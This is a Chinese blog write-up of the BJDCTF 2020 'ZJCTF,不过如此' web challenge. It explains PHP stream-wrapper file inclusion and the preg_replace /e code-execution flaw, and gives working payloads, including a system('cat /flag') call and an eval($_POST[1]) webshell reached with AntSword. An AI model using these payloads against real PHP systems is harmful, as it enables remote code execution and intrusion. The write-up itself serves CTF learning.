[BJDCTF 2020]ZJCTF,不过如此解题思路(preg_replace \e 模式中的漏洞)

于 2024-08-17 00:44:04 发布
阅读量690 收藏 10
点赞数 30
文章标签: 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80307383/article/details/141268030
版权

题目来源:[BJDCTF 2020]ZJCTF,不过如此 | NSSCTF

参考:preg_replace /e 模式 漏洞分析总结 - 猪猪侠的哥哥 - 博客园 (cnblogs.com)

深入研究 preg_replace /e 模式下的代码漏洞问题_Web安全_心月IT博客 (xinyueseo.com)

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

打开后发现是文件包含php伪协议,提示要我们去包含next.php,这一步没什么好说的

有两种方式满足

1./?text=data://plain/text,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php

2./?text=php://input&file=php://filter/read=convert.base64-encode/resource=next.php

post传参I have a dream

解码后得到next.php内容

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

分四部分详细解释一下 

1.

$id = $_GET['id'];
$_SESSION['id'] = $id;

获取id再保存在session中,与本题目解法无关,可忽略

2.

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

complex函数接收参数,并正则后返回,详细解释下这个正则表达式

参数1: '/(' . $re . ')/ei'

$re 是作为参数传递给 complex 函数的正则表达式。

括号 () 创建一个捕获组,这意味着匹配的内容将被保存,以便在替换时使用。

e 修饰符允许将替换字符串作为PHP代码执行。

i 修饰符使正则表达式匹配不区分大小写。

strtolower 是PHP内置函数,用于将字符串转换为小写。

\\1 是反向引用,它引用第一个捕获组匹配到的文本。

反向引用

对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 'n' 访问,其中 n 为一个标识特定缓冲区的一位或两位十进制数

complex函数相当于 eval('strtolower("\1");') 结果

3.

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

foreach($_GET as $re => $str):这行代码开始一个 foreach 循环,遍历 $_GET 数组。在这个循环中,$re 是键(参数名),$str 是对应的值。

4.

function getFlag()

{ @eval($_GET['cmd']); }

用此函数来进行解题,想办法调用getFlag函数

看别人的wp总结的要点

1.在${}中可以调用函数

2.在php中,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果;单引号中的变量不会被处理。所以该漏洞正则表达式第二个变量必须为双引号

3.初始payload:.*={${phpinfo()}} ,即 GET 方式传入的参数名为 .* ,值为 {${phpinfo()}} 

但对于传入的非法的 $_GET 数组参数名,会将其转换成下划线,这就导致我们正则匹配失效。

所以要换为\S*=${phpinfo()}

在将phpinfo改为getFlag在传参cmd即可获得flag但是我构造时

payload写为?\S*=${getFlag()}&cmd=system("cat%20/flag");

不成功(ls /命令成功了),改为?\S*=${getFlag()}&cmd=eval($_POST[1]);链接蚁剑可行

发现flag时空的

那应该在环境变量里,再次改为\S*=${phpinfo()}找到

但测试?\S*=${getFlag()}&cmd=system(“env”);时也得不到payload不知道为啥

记嘚开心壹点
关注
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace
qq_43622442的博客
05-09 1995
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
[BJDCTF2020]ZJCTF不过如此(preg_replace /e 模式下的代码漏洞问题)
xlcvv的博客
04-30 673
题目给了源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_ge...
[BJDCTF2020]ZJCTF不过如此1详解
最新发布
2301_77451464的博客
04-16 422
preg_replace()的/e模式存在命令执行漏洞。(只要看到了上面这一行代码,就想到用payload:\S*=${phpinfo()})2.用php://filter构造伪协议。1.用data构造伪协议。
[BJDCTF2020]ZJCTF不过如此(wp)
wikey 的博客
03-30 316
看到file_get_contents()函数,就要联想到用php伪协议,需要用data://协议用filter协议去读下next.php的源码。一道老题,nss和buu上都有这道题,但是同样的步骤在buu上可以做出来但是nss平台上有点问题,就以buu为讲解。data://数据流封装器,以传递相应格式的数据。
[BJDCTF2020]ZJCTF不过如此
pakho_C的博客
02-26 4117
web第39题 [BJDCTF2020]ZJCTF不过如此 打开靶场 有点眼熟 参考我做的另一道题:buuctf初学者学习记录–[ZJCTF 2019]NiZhuanSiWei 代码审计: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ ec
[BJDCTF2020]ZJCTF不过如此(特详解)
热门推荐
qq_74806534的博客
01-24 1万+
而这段代码里面的第一个子匹配项就是${phpinfo()}。编码设定,这是一个可选项,base64 编码仅包含 0-9,a-z,A-Z,+,/,=,其 = 是用来编码补白的。我们先看第二个参数的\1 ,\1实际上就是 \1,而 \1 在正则表达式有自己的含义,最后一部分为这个 Data URI 承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容。单引号的变量不会被处理。这里我们发现了.变成了_,这是因为php会将传入的非法的参数名转成下滑线,所以我们的正则匹配才会失效。
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换...
PHP正则替换函数preg_replace和preg_replace_callback使用总结
12-18
`preg_replace()` 函数用于在字符串执行正则表达式的搜索和替换操作。其基本语法如下: ```php string preg_replace ( mixed $pattern, mixed $replacement, mixed $subject [, int $limit = -1 ] [, int &$count...
php preg_match_all结合str_replace替换内容所有img
10-30
PHP编程,`preg_match_all` 和 `str_replace` 是两个非常重要的字符串处理函数,它们经常被用来处理HTML或XML文档的特定内容。在这个场景,开发者需要从采集的数据提取并替换`<img>`标签,以符合站点的...
2020/7/15 - [BJDCTF2020]ZJCTF不过如此 - 伪协议、preg_replace /e模式命令执行
抒情诗
07-16 478
文章目录1.代码审计2.base后,再审计3.payload 根据开始的时候主页面给得php代码 1.代码审计 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_conten
[BJDCTF2020]ZJCTF不过如此1
qq_48008847的博客
07-16 1775
通过分析代码,get传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议的data://协议用filter协议去读下next.php的源码 获取next.php的payload: index.php?text=data://text..
[BJDCTF2020]ZJCTF不过如此 1
qq_43618536的博客
07-04 713
BUUCTF的[BJDCTF2020]ZJCTF不过如此 1
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2375
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
PHP preg_replace与preg_replace_callback深度解析及其应用场景
`preg_replace`通常用于全局搜索并替换符合正则表达式的字符串,而`preg_replace_callback`则提供了更高级的功能,它允许你在替换过程执行用户自定义的回调函数,增强了灵活性。 `preg_replace`函数的基本语法是`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值